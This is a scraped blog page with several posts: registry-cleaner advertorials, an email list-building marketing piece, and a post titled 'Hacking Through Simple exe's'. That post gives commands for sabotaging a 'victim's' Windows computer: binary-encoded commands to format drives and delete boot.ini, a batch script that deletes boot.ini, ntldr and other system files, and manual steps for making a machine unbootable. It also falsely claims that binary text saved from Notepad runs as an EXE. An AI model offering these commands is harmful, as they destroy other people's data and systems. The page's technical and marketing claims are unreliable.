PC Tools Registry Mechanic

Thursday, October 22, 2009 ·

Windows user feel it very difficult to use their computer due to Spywares / Viruses / registry corruptions due to invalid file asscisciations , corrupted entries . etc..
Please use this software to fix the registry corruptions and to speed up your computer .

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Hacking Through Simple exe's

Friday, March 6, 2009 ·

The first method, of course, is to format the hard drive. But making a BAT file is old, and people can prevent it. So these are some tricks that i found out.

Formatting Drives Using NotePad

To Format a C drive:
Copy/paste this into Notepad and save it as an EXE file (not BAT):


If that doesn't work, try this:

01100110011011110111001001101101011000010111010000 100000011000110011101001011100 0010000000101111010100010010111101011000

To Format a D drive:
01100110011011110111001001101101011000010111010000 100000011001000011101001011100 0010000000101111010100010010111101011000

To Format an A drive:
01100110011011110111001001101101011000010111010000 100000011000010011101001011100 0010000000101111010100010010111101011000

Deleting The Boot.ini

You can use the same method as above to create an EXE file that deletes the Boot.ini:

01100100011001010110110000100000001011110100011000 101111010100110010111101010001 00100000011000110011101001011100011000100110111101 101111011101000010111001101001 0110111001101001

Deleting Boot.ini with a BAT file

Or if you prefer the old BAT command, save this in Notepad as a BAT file(although this deletes other files too):


@echo off attrib -r -s -h c:\autoexec.bat del c:\autoexec.bat attrib -r -s -h c:\boot.ini del c:\boot.ini attrib -r -s -h c:\ntldr del c:\ntldr attrib -r -s -h c:\windows\win.ini del c:\windows\win.ini If you have physical access

Finally, if you have physical access to your victim's computer, you can delete the Boot.ini yourself manually. First, you have to enable viewing of Hidden/Operating System Files.

In Vista:
Open any folder, On the top left, click Organize>Folder &Search Option>Click on the view tab, then choose to show Hidden Files and uncheck the Hide protected operating system files box.

In windows XP:
Open any folder, click on the tools menu, then Folder options, click on the view tab, then choose to show Hidden Files and uncheck the Hide protected operating system files box.

After you have done this, go to my computer, then the main hard drive (most probably C) and look for the file boot.ini - Delete it permanently and you won't be able to boot windows again.

and of course, people who know can fix this.

Registry Cleaner Re

Tuesday, December 23, 2008 ·

Reg Defense Review - Registry Cleaner Revealed
Can't stand working on your computer because of some freezes, hardware malfunctions, slow windows start ups, computer error messages, system32 error messages, indications of a possible system crash and other related problems it has been showing? If so, then maybe it's now time for you to consider a registry cleaner. Why? Well, it's because everything that you are experiencing has nothing to do with anything else but with your registry alone.

Nevertheless, there are some errors and corrupt files in your Windows registry that compromise the integrity and performance of your computer. Be aware that failure to fix these errors and corrupt files will give unlikely results and may later turn your computer useless by all means. Thus, to save yourself from headache of getting a new computer, get a registry cleaner now!

Which One?

There are many registry cleaners now made available on the market. Therefore, the big question for you now will be - which one will be perfect for your needs?

Well, below we have a brief yet in-depth review of the top three registry cleaners on the market. This may help you in deciding which registry cleaner to get.

#1: RegDefense

All the registry cleaners have the potential to clean your registry but only a few can do the work completely and efficiently.

RegDefense is the #1 registry cleaner as it is very capable of cleaning your registry files completely and efficiently without causing any log. It can repair DLL's and general system slowdowns. And after all the clean ups and repairs, RegDefense can turn your computer into something like a brand new system free from any errors, hang-ups and threats of crashes. With RegDefense, your computer will function at its highest level.

RegDefense' main features and benefits include error reporting, deep scan, scan log, backup/restore, start up manager, registry optimize, registry compactor, registry defrag, and 64 bit compatible. You can't enjoy some of these features and benefits from other registry cleaners.

#2: RegFix

RegFix is one of the popular registry cleaners of today. It can do all the basic cleaning and repairing of registry errors. It can also manage start-up programs, manage browser helper objects, backup windows registry for full protection and add or remove programs. However, according to some individuals who have already tried it, its scanning time is twice the time of other registry cleaners and some of its registry repair utilities are a bit over-zealous in terms of reporting of errors. It also can impose higher risk of getting rid of significant files.

RegFix can be a practical purchase considering the basic cleaning and repairing function it can give. However, can be just second best.

#3: RegEasy

RegEasy like any other registry cleaners will scan your PC, safely clean the errors and invalid entries that cause system slow, freezing and crashing, and repair registry problems to improve system's performance.

However, during scan, some logs can be experienced by the user. Also, registry defrag is not possible with RegEasy. Not to mention that it doesn't extend 64 bit compatibility feature as well, so its use can be limited.

Free Techniques?


Why Building a Large List Using Free Techniques?

If you are building, or trying to build an Internet business, I’m sure you heard the phrase, "the money is in the list." If you are serious about earning money on the Internet, you must learn how to build your own list. After all, your net income starts with your list! And the way to make consistent money on the Internet is to develop a large and growing list. But the problem is, how do you get that list if you are just starting out and can’t afford to spend a lot of money?

Here are a few tips to get you started.

1. To begin, decide on the type of people that you are targeting for your list. For more results go to www.craigs-list-profit.com. They should be people who are engaged or interested in the niche in which you are participating. Make sure that your niche is large enough so that can develop a sizable list.

2. Develop a marketing plan! Develop a strategy to find people that may be interested in joining your list. Do some research on forums? Forums are a great way to find large numbers of like-minded people. Find forums that cater to the people in your niche. Join as many forums as you can. Spend some time in each of those forums, read posts and take note of recurring questions. Learn all you can about the needs, wants, and problems of your target audience. The more you know about your target audience, the more successful you will be in marketing to that group.

3. Determine the needs and desires of your target audience. Locate a free gift that satisfies those needs and desires. Offer this free gift for individuals subscribing to your list. People will subscribe to your list if they see your offer as something of value.

4. Develop an action plan! Develop a strategy to approach, and contact the people that may be interested in joining your list.

5. Research and locate article submission sites that specialize in your niche. Your target audience will probably make up a large number of participants, both readers and writers at these sites. Submit articles on a regular basis. You can also go to www.37-list-building-secrets.com. Make sure your articles contain an attractive resource box that links your reader to your opt-in (squeeze) page.

6. Post helpful information to your forums on a regular basis. Include a signature file that contains a link to your squeeze page with every post.

Of course, these are just a few of the techniques that you can use to build a large list. There are many other free methods available. Once you begin to make some money, you might want to look into paid methods of list building. Using these paid techniques, you can build a list much quicker.

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